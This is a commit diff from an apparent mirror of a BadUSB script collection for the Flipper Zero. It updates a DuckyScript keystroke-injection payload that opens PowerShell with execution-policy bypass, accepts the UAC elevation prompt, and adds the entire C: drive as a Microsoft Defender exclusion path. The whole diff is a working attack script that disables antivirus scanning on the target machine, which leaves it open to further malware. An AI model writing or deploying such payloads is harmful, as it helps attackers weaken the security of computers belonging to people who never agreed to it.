mirror of
https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git
synced 2025-12-25 12:24:56 -08:00
Update Add Exclusion C-drive.txt
This commit is contained in:
@@ -9,15 +9,7 @@ DEFAULT_DELAY 100
|
||||
REM open powershell (remove -W Hidden to show the window).
|
||||
GUI r
|
||||
DELAY 750
|
||||
STRING powershell -NoP -NonI -W Hidden -Exec Bypass
|
||||
STRING powershell -Exec Bypass -C Add-MpPreference -ExclusionPath C:\
|
||||
CTRL-SHIFT ENTER
|
||||
DELAY 1500
|
||||
DELAY 2500
|
||||
ALT y
|
||||
DELAY 5000
|
||||
|
||||
REM add the exclusion path.
|
||||
STRING Add-MpPreference -ExclusionPath C:\
|
||||
ENTER
|
||||
DELAY 250
|
||||
STRING exit
|
||||
ENTER
|
||||
|
||||
Reference in New Issue
Block a user